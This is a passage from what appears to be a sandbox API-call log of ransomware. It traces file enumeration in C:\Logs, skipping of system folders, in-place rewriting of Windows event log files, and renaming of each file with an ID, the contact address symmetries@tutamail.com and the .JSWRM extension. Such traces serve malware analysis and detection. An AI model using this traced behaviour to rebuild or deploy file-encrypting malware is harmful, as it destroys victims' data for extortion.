"c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0064.990] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2=".") returned 1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="..") returned 1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="...") returned 1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="windows") returned -1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="recovery") returned -1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="perflogs") returned -1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="documents and settings") returned 1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="system volume information") returned -1 [0064.990] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpString2="msocache") returned -1 [0064.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0064.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0064.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchWideChar=45, lpMultiByteStr=0x1f8638, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpUsedDefaultChar=0x0) returned 45 [0064.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0064.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0064.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0064.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchWideChar=45, lpMultiByteStr=0x1f8328, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpUsedDefaultChar=0x0) returned 45 [0064.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0064.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0064.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0064.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0064.991] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.991] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.991] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.991] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.996] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.996] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.996] CloseHandle (hObject=0x450) returned 1 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0064.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0064.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0064.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0064.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f3a8 [0064.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0064.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.998] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.999] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2=".") returned 1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="..") returned 1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="...") returned 1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="windows") returned -1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="recovery") returned -1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="perflogs") returned -1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="documents and settings") returned 1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="system volume information") returned -1 [0064.999] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpString2="msocache") returned -1 [0064.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0064.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0064.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchWideChar=48, lpMultiByteStr=0x20e268, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpUsedDefaultChar=0x0) returned 48 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0064.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0064.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0064.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchWideChar=48, lpMultiByteStr=0x20e418, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpUsedDefaultChar=0x0) returned 48 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0064.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0064.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0064.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0065.000] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.000] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.000] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.000] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.005] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.005] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.005] CloseHandle (hObject=0x450) returned 1 [0065.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0065.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0065.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0065.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0065.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.008] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.008] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2=".") returned 1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="..") returned 1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="...") returned 1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="windows") returned -1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="recovery") returned -1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="perflogs") returned -1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="documents and settings") returned 1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="system volume information") returned -1 [0065.009] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpString2="msocache") returned -1 [0065.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0065.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0065.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchWideChar=57, lpMultiByteStr=0x20e268, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpUsedDefaultChar=0x0) returned 57 [0065.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0065.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0065.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0065.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0065.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchWideChar=57, lpMultiByteStr=0x20dec0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpUsedDefaultChar=0x0) returned 57 [0065.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0065.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0065.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0065.009] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.009] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.009] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.010] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.021] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.021] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.021] CloseHandle (hObject=0x450) returned 1 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0065.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 